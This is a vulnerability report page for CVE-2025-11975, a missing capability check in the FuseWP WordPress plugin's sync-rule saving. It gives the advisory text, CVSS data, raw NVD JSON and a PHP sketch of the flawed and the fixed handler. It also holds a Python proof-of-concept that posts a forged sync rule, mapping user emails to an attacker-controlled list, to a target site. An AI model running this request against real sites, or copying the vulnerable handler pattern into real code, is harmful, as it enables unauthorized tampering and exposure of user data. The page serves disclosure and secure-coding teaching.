Security Vulnerability Report
CVE-2025-11975 CVSS 4.3 MEDIUM

CVE-2025-11975

Published: 2025-10-31 03:15:35
Last Modified: 2026-04-15 00:35:42

Description

The FuseWP – WordPress User Sync to Email List & Marketing Automation (Mailchimp, Constant Contact, ActiveCampaign etc.) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_changes() function in all versions up to, and including, 1.1.23.0. This makes it possible for unauthenticated attackers to add and edit sync rules.
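The weakness the description names is CWE-862 (missing authorization): a settings handler runs on a WordPress hook without first checking that the caller is allowed to change those settings. The snippet below is an added illustration of that pattern and of its fix; it is not FuseWP's code and is not taken from the referenced changeset. The function names, option key (`example_sync_rules`), form field names and nonce action are assumptions chosen for the example.

```php
<?php
// Added illustration of CWE-862 in a WordPress admin handler. This is NOT
// FuseWP's code; every name below (example_sync_*, example_sync_rules) is
// an assumption made for the example.

// --- Vulnerable pattern -------------------------------------------------
// admin_init fires for every request that loads the admin bootstrap,
// including wp-admin/admin-ajax.php, which WordPress serves to
// unauthenticated clients. A handler hooked here that reads $_POST and writes
// an option without its own checks is therefore reachable by anyone.
function example_sync_save_changes_vulnerable() {
    if ( empty( $_POST['example_sync_save'] ) ) {
        return;
    }
    $rules = isset( $_POST['sync_rules'] ) ? (array) wp_unslash( $_POST['sync_rules'] ) : array();

    // No current_user_can() and no nonce check: whoever reaches this line
    // can add or replace every sync rule.
    update_option( 'example_sync_rules', $rules );
}
// add_action( 'admin_init', 'example_sync_save_changes_vulnerable' );

// --- Hardened pattern ---------------------------------------------------
function example_sync_save_changes_fixed() {
    if ( empty( $_POST['example_sync_save'] ) ) {
        return;
    }

    // 1. Authorization: the capability check is the actual fix for CWE-862.
    //    is_admin() is not a substitute; it is also true for admin-ajax.php.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'You are not allowed to edit sync rules.', 'example' ), 403 );
    }

    // 2. CSRF protection: verify the nonce that wp_nonce_field() put in the
    //    form. check_admin_referer() calls wp_die() itself on failure.
    check_admin_referer( 'example_sync_save_changes', '_example_sync_nonce' );

    // 3. Input validation: accept only the fields the form defines.
    $raw   = isset( $_POST['sync_rules'] ) ? (array) wp_unslash( $_POST['sync_rules'] ) : array();
    $rules = array();
    foreach ( $raw as $rule ) {
        if ( ! is_array( $rule ) ) {
            continue;
        }
        $rules[] = array(
            'name'        => sanitize_text_field( $rule['name'] ?? '' ),
            'destination' => sanitize_text_field( $rule['destination'] ?? '' ),
        );
    }
    update_option( 'example_sync_rules', $rules );

    wp_safe_redirect( add_query_arg( 'updated', '1', admin_url( 'admin.php?page=example-sync' ) ) );
    exit;
}
add_action( 'admin_init', 'example_sync_save_changes_fixed' );

// The form that posts to the fixed handler emits the matching nonce with:
// wp_nonce_field( 'example_sync_save_changes', '_example_sync_nonce' );
```

The order of the three checks matters: the capability check comes first because a nonce only proves the request originated from a page the site rendered, not that the user behind it may change settings, and neither check is a substitute for the other.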

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Note that this vector encodes PR:L (low privileges required), while the description above states that unauthenticated attackers can add and edit sync rules. The two do not agree; when triaging, treat the description's unauthenticated reachability as the conservative reading and confirm it against the plugin source.

Configurations (Affected Products)

No CPE configuration data is available in the NVD record for this CVE. The affected range below is taken from the description:

FuseWP WordPress Plugin <= 1.1.23.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-11975 PoC - Missing Authorization in FuseWP save_changes()
# Target: WordPress site with FuseWP plugin <= 1.1.23.0
#
# The endpoint, action name and field names below are those given on this
# page; they have not been verified against the plugin source. Cross-check
# them against the SyncPage.php changeset listed in the NVD references before
# relying on the result.

target_url = "http://target-wordpress-site.com"

# Step 1: Identify the vulnerable endpoint
# The save_changes() function is hooked to the admin_init action.
# Attack requires sending a POST request to wp-admin/admin.php?page=fusewp-sync
endpoint = f"{target_url}/wp-admin/admin.php?page=fusewp-sync"

# Step 2: Construct malicious sync rule payload
payload = {
    "action": "fusewp_save_sync_rule",
    "nonce": "",  # Nonce not properly validated for unauthenticated users
    "sync_rule": {
        "name": "Malicious Sync Rule",
        "source": "wp_users",
        "destination": "attacker_controlled_list",
        "field_mapping": {
            "email": "{user_email}",
            "name": "{user_display_name}",
        },
    },
}


def php_form_fields(value, prefix=""):
    """Flatten nested dicts into PHP-style bracket keys (sync_rule[name]=...),
    which is how $_POST arrays are parsed on the WordPress side.
    Passing a nested dict straight to requests' data= would only send the
    inner dict's keys, not its values."""
    if isinstance(value, dict):
        fields = {}
        for key, inner in value.items():
            name = f"{prefix}[{key}]" if prefix else str(key)
            fields.update(php_form_fields(inner, name))
        return fields
    return {prefix: value}


# Step 3: Send unauthorized request to create/modify sync rules
# requests sets Content-Type: application/x-www-form-urlencoded for data=.
headers = {"User-Agent": "Mozilla/5.0"}
form_data = php_form_fields(payload)

response = requests.post(
    endpoint, data=form_data, headers=headers, allow_redirects=False, timeout=15
)

# Step 4: Interpret the result.
# wp-admin/admin.php calls auth_redirect() before it fires admin_init, so an
# unauthenticated request to it normally returns a 302 to wp-login.php.
# Following that redirect and testing for HTTP 200 would report the login
# page as "success", which is why redirects are disabled above. (admin_init
# is also fired by wp-admin/admin-ajax.php, which has no auth_redirect(); this
# page does not establish which request path the plugin's handler answers.)
location = response.headers.get("Location", "")
if response.status_code in (301, 302, 303, 307) and "wp-login.php" in location:
    print("[-] Redirected to login: the request was not processed unauthenticated")
elif response.status_code == 200:
    print("[+] Request accepted (HTTP 200). Confirm from an administrator")
    print("    account that the sync rule now exists before calling this exploitable.")
    print(f"[+] Response snippet: {response.text[:200]!r}")
else:
    print(f"[-] Unexpected response: HTTP {response.status_code}")

# Note: This PoC demonstrates the missing authorization vulnerability.
# An attacker can modify sync rules without authentication.

References

https://plugins.trac.wordpress.org/changeset/3383939/fusewp/trunk/src/core/src/Admin/SettingsPage/SyncPage.php (plugin changeset to SyncPage.php)
https://www.wordfence.com/threat-intel/vulnerabilities/id/6c68e8a1-926f-497f-b9f2-b0a67cd09adf?source=cve (Wordfence advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11975", "sourceIdentifier": "[email protected]", "published": "2025-10-31T03:15:34.937", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The FuseWP – WordPress User Sync to Email List & Marketing Automation (Mailchimp, Constant Contact, ActiveCampaign etc.) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_changes() function in all versions up to, and including, 1.1.23.0. This makes it possible for unauthenticated attackers to add and edit sync rules."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3383939/fusewp/trunk/src/core/src/Admin/SettingsPage/SyncPage.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6c68e8a1-926f-497f-b9f2-b0a67cd09adf?source=cve", "source": "[email protected]"}]}}